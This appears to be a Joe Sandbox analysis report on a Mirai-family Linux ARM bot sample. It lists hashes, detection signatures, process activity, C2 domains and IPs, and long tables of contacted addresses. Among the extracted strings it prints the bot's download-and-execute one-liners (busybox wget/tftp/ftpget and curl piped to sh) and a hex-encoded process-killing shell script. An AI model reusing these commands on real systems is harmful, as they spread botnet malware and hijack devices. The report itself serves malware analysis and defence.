Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nabarm.elf

Overview

General Information

Sample name:nabarm.elf
Analysis ID:1564374
MD5:d3732e7cd3d368f2be29887954b2f4bc
SHA1:dafece6c3225fd0ed2e2efaf4cf16040e285b60c
SHA256:c18308152e39a609a20e4f82a2455fcb42107964ea957f511aafdb2f9751f167
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1564374
Start date and time:2024-11-28 09:07:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nabarm.elf
Detection:MAL
Classification:mal56.troj.linELF@0/91@8/0
Command:/tmp/nabarm.elf
PID:5441
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5410, Parent: 3578)
  • rm (PID: 5410, Parent: 3578, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0
  • dash New Fork (PID: 5411, Parent: 3578)
  • rm (PID: 5411, Parent: 3578, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0
  • nabarm.elf (PID: 5441, Parent: 5343, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nabarm.elf
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nabarm.elfReversingLabs: Detection: 36%
Source: nabarm.elfString: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4l

Networking

barindex
Source: global trafficTCP traffic: 154.213.187.214 ports 38241,1,2,3,4,8
Source: global trafficTCP traffic: 154.213.187.245 ports 38241,1,2,3,4,8
Source: global trafficTCP traffic: 154.213.187.248 ports 38241,1,2,3,4,8
Source: global trafficTCP traffic: 154.213.187.249 ports 38241,1,2,3,4,8
Source: global trafficDNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global trafficTCP traffic: 192.168.2.13:42756 -> 154.213.187.214:38241
Source: global trafficTCP traffic: 192.168.2.13:37866 -> 154.213.187.248:38241
Source: global trafficTCP traffic: 192.168.2.13:48896 -> 154.213.187.245:38241
Source: global trafficTCP traffic: 192.168.2.13:53776 -> 154.213.187.249:38241
Source: /tmp/nabarm.elf (PID: 5441)Socket: 127.0.0.1:39148Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 112.57.194.21
Source: unknownTCP traffic detected without corresponding DNS query: 11.253.232.223
Source: unknownTCP traffic detected without corresponding DNS query: 119.182.35.142
Source: unknownTCP traffic detected without corresponding DNS query: 130.9.215.70
Source: unknownTCP traffic detected without corresponding DNS query: 15.186.224.29
Source: unknownTCP traffic detected without corresponding DNS query: 153.92.158.9
Source: unknownTCP traffic detected without corresponding DNS query: 208.182.239.143
Source: unknownTCP traffic detected without corresponding DNS query: 70.117.64.216
Source: unknownTCP traffic detected without corresponding DNS query: 77.125.112.89
Source: unknownTCP traffic detected without corresponding DNS query: 58.46.70.252
Source: unknownTCP traffic detected without corresponding DNS query: 200.30.100.222
Source: unknownTCP traffic detected without corresponding DNS query: 121.147.7.23
Source: unknownTCP traffic detected without corresponding DNS query: 213.66.132.187
Source: unknownTCP traffic detected without corresponding DNS query: 100.193.107.183
Source: unknownTCP traffic detected without corresponding DNS query: 53.103.154.248
Source: unknownTCP traffic detected without corresponding DNS query: 47.23.149.177
Source: unknownTCP traffic detected without corresponding DNS query: 188.163.160.44
Source: unknownTCP traffic detected without corresponding DNS query: 59.159.3.240
Source: unknownTCP traffic detected without corresponding DNS query: 7.120.113.192
Source: unknownTCP traffic detected without corresponding DNS query: 112.57.194.21
Source: unknownTCP traffic detected without corresponding DNS query: 11.253.232.223
Source: unknownTCP traffic detected without corresponding DNS query: 119.182.35.142
Source: unknownTCP traffic detected without corresponding DNS query: 130.9.215.70
Source: unknownTCP traffic detected without corresponding DNS query: 15.186.224.29
Source: unknownTCP traffic detected without corresponding DNS query: 153.92.158.9
Source: unknownTCP traffic detected without corresponding DNS query: 208.182.239.143
Source: unknownTCP traffic detected without corresponding DNS query: 70.117.64.216
Source: unknownTCP traffic detected without corresponding DNS query: 77.125.112.89
Source: unknownTCP traffic detected without corresponding DNS query: 58.46.70.252
Source: unknownTCP traffic detected without corresponding DNS query: 200.30.100.222
Source: unknownTCP traffic detected without corresponding DNS query: 121.147.7.23
Source: unknownTCP traffic detected without corresponding DNS query: 213.66.132.187
Source: unknownTCP traffic detected without corresponding DNS query: 100.193.107.183
Source: unknownTCP traffic detected without corresponding DNS query: 53.103.154.248
Source: unknownTCP traffic detected without corresponding DNS query: 47.23.149.177
Source: unknownTCP traffic detected without corresponding DNS query: 188.163.160.44
Source: unknownTCP traffic detected without corresponding DNS query: 59.159.3.240
Source: unknownTCP traffic detected without corresponding DNS query: 7.120.113.192
Source: unknownTCP traffic detected without corresponding DNS query: 112.57.194.21
Source: unknownTCP traffic detected without corresponding DNS query: 11.253.232.223
Source: unknownTCP traffic detected without corresponding DNS query: 119.182.35.142
Source: unknownTCP traffic detected without corresponding DNS query: 130.9.215.70
Source: unknownTCP traffic detected without corresponding DNS query: 15.186.224.29
Source: unknownTCP traffic detected without corresponding DNS query: 208.182.239.143
Source: unknownTCP traffic detected without corresponding DNS query: 70.117.64.216
Source: unknownTCP traffic detected without corresponding DNS query: 77.125.112.89
Source: unknownTCP traffic detected without corresponding DNS query: 153.92.158.9
Source: unknownTCP traffic detected without corresponding DNS query: 200.30.100.222
Source: unknownTCP traffic detected without corresponding DNS query: 58.46.70.252
Source: unknownTCP traffic detected without corresponding DNS query: 121.147.7.23
Source: global trafficDNS traffic detected: DNS query: netfags.geek
Source: global trafficDNS traffic detected: DNS query: burnthe.libre
Source: global trafficDNS traffic detected: DNS query: netfags.geek. [malformed]
Source: nabarm.elfString found in binary or memory: http:///curl.sh
Source: nabarm.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sampleString containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal56.troj.linELF@0/91@8/0
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5470/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5470/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5481/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5481/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5481/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5481/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5471/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5471/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5482/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5482/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5482/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5482/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5472/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5472/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5483/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5483/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5483/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5483/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5473/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5473/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5484/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5484/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5484/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5484/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5474/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5474/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5475/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5475/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5476/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5476/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5477/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5477/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5480/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5480/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5480/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5480/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5467/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5467/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5478/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5478/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5468/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5468/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5479/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5479/cmdlineJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5469/mapsJump to behavior
Source: /tmp/nabarm.elf (PID: 5447)File opened: /proc/5469/cmdlineJump to behavior
Source: /usr/bin/dash (PID: 5410)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0Jump to behavior
Source: /usr/bin/dash (PID: 5411)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0Jump to behavior
Source: /tmp/nabarm.elf (PID: 5441)Queries kernel information via 'uname': Jump to behavior
Source: nabarm.elf, 5441.1.000056298a39b000.000056298a4c9000.rw-.sdmp, nabarm.elf, 5445.1.000056298a39b000.000056298a4c9000.rw-.sdmpBinary or memory string: )V!/etc/qemu-binfmt/arm
Source: nabarm.elf, 5441.1.00007ffe5e638000.00007ffe5e659000.rw-.sdmp, nabarm.elf, 5445.1.00007ffe5e638000.00007ffe5e659000.rw-.sdmpBinary or memory string: ~x86_64/usr/bin/qemu-arm/tmp/nabarm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nabarm.elf
Source: nabarm.elf, 5441.1.000056298a39b000.000056298a4c9000.rw-.sdmp, nabarm.elf, 5445.1.000056298a39b000.000056298a4c9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nabarm.elf, 5441.1.00007ffe5e638000.00007ffe5e659000.rw-.sdmp, nabarm.elf, 5445.1.00007ffe5e638000.00007ffe5e659000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
File Deletion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564374 Sample: nabarm.elf Startdate: 28/11/2024 Architecture: LINUX Score: 56 20 netfags.geek. [malformed] 2->20 22 80.85.229.241, 23, 35924 ZETOSA-ASPL Poland 2->22 24 101 other IPs or domains 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 Connects to many ports of the same IP (likely port scanning) 2->28 8 dash rm nabarm.elf 2->8         started        10 dash rm 2->10         started        signatures3 30 Sends malformed DNS queries 20->30 process4 process5 12 nabarm.elf 8->12         started        process6 14 nabarm.elf 12->14         started        16 nabarm.elf 12->16         started        18 nabarm.elf 12->18         started       
SourceDetectionScannerLabelLink
nabarm.elf37%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
netfags.geek
154.213.187.242
truefalse
    high
    burnthe.libre
    154.213.187.247
    truefalse
      high
      netfags.geek. [malformed]
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shnabarm.elffalse
          high
          http:///curl.shnabarm.elffalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            221.19.219.132
            unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
            221.167.50.57
            unknownKorea Republic of
            9631YSU-AS-KRyoungsanuniversityKRfalse
            162.113.63.188
            unknownUnited States
            19113DUKE-ENERGYUSfalse
            86.89.82.154
            unknownNetherlands
            1136KPNKPNNationalEUfalse
            129.138.171.216
            unknownUnited States
            17153NMT-ASUSfalse
            55.243.232.22
            unknownUnited States
            306DNIC-ASBLK-00306-00371USfalse
            1.76.53.5
            unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
            77.125.112.89
            unknownIsrael
            9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
            104.249.172.85
            unknownUnited States
            13886CLOUD-SOUTHUSfalse
            6.130.54.74
            unknownUnited States
            3356LEVEL3USfalse
            200.110.99.116
            unknownunknown
            270251GHOSTTelecomBRfalse
            135.111.163.170
            unknownUnited States
            10455LUCENT-CIOUSfalse
            12.6.30.250
            unknownUnited States
            7018ATT-INTERNET4USfalse
            173.14.85.113
            unknownUnited States
            7922COMCAST-7922USfalse
            130.49.59.239
            unknownUnited States
            4130UPITT-ASUSfalse
            64.77.86.22
            unknownCanada
            13768COGECO-PEER1CAfalse
            171.64.30.26
            unknownUnited States
            32STANFORDUSfalse
            193.9.191.139
            unknownDenmark
            49362DSVDKfalse
            147.14.192.176
            unknownSweden
            41076POSTDK-ASDKfalse
            104.190.57.93
            unknownUnited States
            7018ATT-INTERNET4USfalse
            145.239.10.162
            unknownFrance
            16276OVHFRfalse
            93.184.160.255
            unknownRussian Federation
            47522LLC_NETFORT-ASRUfalse
            80.85.229.241
            unknownPoland
            21404ZETOSA-ASPLfalse
            133.22.181.176
            unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
            151.128.126.144
            unknownUnited States
            45025EDN-ASUAfalse
            107.11.195.187
            unknownUnited States
            10796TWC-10796-MIDWESTUSfalse
            62.188.108.92
            unknownUnited Kingdom
            702UUNETUSfalse
            80.124.175.149
            unknownFrance
            15557LDCOMNETFRfalse
            206.108.173.135
            unknownCanada
            21570ACI-1CAfalse
            94.121.156.58
            unknownTurkey
            12978DOGAN-ONLINETRfalse
            75.133.191.234
            unknownUnited States
            20115CHARTER-20115USfalse
            155.5.36.241
            unknownUnited States
            1637DNIC-AS-01637USfalse
            81.223.179.62
            unknownAustria
            6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
            107.57.59.199
            unknownUnited States
            16567NETRIX-16567USfalse
            109.195.47.190
            unknownRussian Federation
            50512BARNAUL-ASRUfalse
            93.137.131.197
            unknownCroatia (LOCAL Name: Hrvatska)
            5391T-HTCroatianTelecomIncHRfalse
            5.63.99.24
            unknownKazakhstan
            9198KAZTELECOM-ASKZfalse
            153.92.158.9
            unknownGermany
            43571NOVAIS-ASISfalse
            151.149.109.244
            unknownUnited States
            54786ACT-ASNUSfalse
            83.105.115.177
            unknownUnited Kingdom
            2529DEMON-INTERNETNowmaintainedbyCableWirelessWorldwidefalse
            15.186.224.29
            unknownUnited States
            71HP-INTERNET-ASUSfalse
            146.15.214.206
            unknownUnited States
            1467DNIC-ASBLK-01467-01468USfalse
            196.181.232.11
            unknownCote D'ivoire
            36974AFNET-ASCIfalse
            122.5.21.28
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            172.75.107.121
            unknownUnited States
            11426TWC-11426-CAROLINASUSfalse
            52.139.101.13
            unknownUnited States
            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            28.0.24.239
            unknownUnited States
            7922COMCAST-7922USfalse
            57.187.152.175
            unknownBelgium
            2686ATGS-MMD-ASUSfalse
            183.250.11.128
            unknownChina
            9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
            141.21.219.184
            unknownGermany
            205046FZI-AS-1DEfalse
            148.163.47.37
            unknownUnited States
            53755IOFLOODUSfalse
            75.208.254.221
            unknownUnited States
            22394CELLCOUSfalse
            16.60.193.28
            unknownUnited States
            unknownunknownfalse
            184.87.212.149
            unknownUnited States
            8529OMANTEL-ASSultanateofOmanOMfalse
            188.175.31.135
            unknownCzech Republic
            16246AS16246InternetProviderCZfalse
            121.204.182.153
            unknownChina
            133774CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCNfalse
            163.174.23.187
            unknownNorway
            57506ASN-PDMTNOfalse
            53.103.154.248
            unknownGermany
            31399DAIMLER-ASITIGNGlobalNetworkDEfalse
            5.226.142.30
            unknownUnited Kingdom
            25369BANDWIDTH-ASGBfalse
            159.29.244.88
            unknownSwitzerland
            397356EARLHAM-COLLEGEUSfalse
            208.182.239.143
            unknownUnited States
            19957TENNESSEE-NETUSfalse
            22.178.71.25
            unknownUnited States
            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            8.190.222.81
            unknownSingapore
            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
            59.54.27.175
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            76.135.171.121
            unknownUnited States
            7922COMCAST-7922USfalse
            57.153.199.115
            unknownBelgium
            2686ATGS-MMD-ASUSfalse
            200.34.63.117
            unknownMexico
            26595EnlacesyComunicacionesdelSuresteSAdeCVMXfalse
            40.41.140.132
            unknownUnited States
            4249LILLY-ASUSfalse
            77.31.218.239
            unknownSaudi Arabia
            25019SAUDINETSTC-ASSAfalse
            37.215.18.142
            unknownBelarus
            6697BELPAK-ASBELPAKBYfalse
            93.204.127.101
            unknownGermany
            3320DTAGInternetserviceprovideroperationsDEfalse
            96.239.248.243
            unknownUnited States
            701UUNETUSfalse
            189.139.64.173
            unknownMexico
            8151UninetSAdeCVMXfalse
            128.21.173.252
            unknownUnited States
            13DNIC-AS-00013USfalse
            47.83.136.212
            unknownUnited States
            3209VODANETInternationalIP-BackboneofVodafoneDEfalse
            189.218.230.131
            unknownMexico
            11888TelevisionInternacionalSAdeCVMXfalse
            56.90.6.34
            unknownUnited States
            2686ATGS-MMD-ASUSfalse
            192.143.182.146
            unknownSouth Africa
            37611AfrihostZAfalse
            119.182.35.142
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            113.244.50.118
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            7.120.113.192
            unknownUnited States
            3356LEVEL3USfalse
            71.55.229.131
            unknownUnited States
            209CENTURYLINK-US-LEGACY-QWESTUSfalse
            169.143.93.20
            unknownUnited States
            26121JEPPESENUSfalse
            205.196.138.243
            unknownUnited States
            7029WINDSTREAMUSfalse
            31.28.22.85
            unknownRussian Federation
            204039CITYTELECOM-VOIP-MSK-ASRUfalse
            188.184.230.200
            unknownSwitzerland
            513CERNCHfalse
            87.130.23.229
            unknownGermany
            3320DTAGInternetserviceprovideroperationsDEfalse
            83.150.101.0
            unknownFinland
            29422NBLNETWORKS-ASNebulaOyFIfalse
            211.227.21.154
            unknownKorea Republic of
            4766KIXS-AS-KRKoreaTelecomKRfalse
            114.184.171.204
            unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
            65.199.158.144
            unknownUnited States
            16983AS16983USfalse
            213.20.21.175
            unknownGermany
            6805TDDE-ASN1DEfalse
            54.126.138.72
            unknownUnited States
            16509AMAZON-02USfalse
            53.104.167.130
            unknownGermany
            31399DAIMLER-ASITIGNGlobalNetworkDEfalse
            78.175.160.96
            unknownTurkey
            9121TTNETTRfalse
            163.74.158.201
            unknownFrance
            17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
            143.219.135.58
            unknownUnited States
            4739INTERNODE-ASInternodePtyLtdAUfalse
            157.171.18.160
            unknownSweden
            22192SSHENETUSfalse
            15.16.170.84
            unknownUnited States
            13979ATT-IPFRUSfalse
            169.197.67.81
            unknownUnited States
            46154FMTJESUPUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            94.121.156.58V0LJvpav7m.elfGet hashmaliciousMiraiBrowse
            • 185.196.9.5:80/cgi-bin/ViewLog.asp
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            netfags.geekx86.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.242
            nabppc.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.242
            nabmips.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.248
            burnthe.librenabmpsl.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.247
            nabx86.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.213
            nabarm5.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.249
            splppc.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.214
            mpsl.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.242
            nabppc.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.242
            ppc.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.213
            sh4.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.214
            nabmips.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.248
            nabarm.elfGet hashmaliciousUnknownBrowse
            • 154.213.187.245
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            DUKE-ENERGYUSarm5.elfGet hashmaliciousUnknownBrowse
            • 148.134.117.115
            belks.mips.elfGet hashmaliciousMiraiBrowse
            • 162.113.181.164
            arm5.elfGet hashmaliciousUnknownBrowse
            • 162.113.221.240
            la.bot.mips.elfGet hashmaliciousUnknownBrowse
            • 162.113.19.0
            nklarm.elfGet hashmaliciousUnknownBrowse
            • 162.113.3.42
            nklppc.elfGet hashmaliciousUnknownBrowse
            • 139.46.246.108
            nabarm.elfGet hashmaliciousUnknownBrowse
            • 139.46.91.210
            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
            • 162.113.181.169
            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
            • 148.134.155.62
            cQOoKCZyG3.elfGet hashmaliciousMiraiBrowse
            • 148.134.126.148
            GIGAINFRASoftbankBBCorpJPbotx.ppc.elfGet hashmaliciousMiraiBrowse
            • 60.86.166.248
            nabmpsl.elfGet hashmaliciousUnknownBrowse
            • 126.229.30.63
            nabarm5.elfGet hashmaliciousUnknownBrowse
            • 221.43.173.49
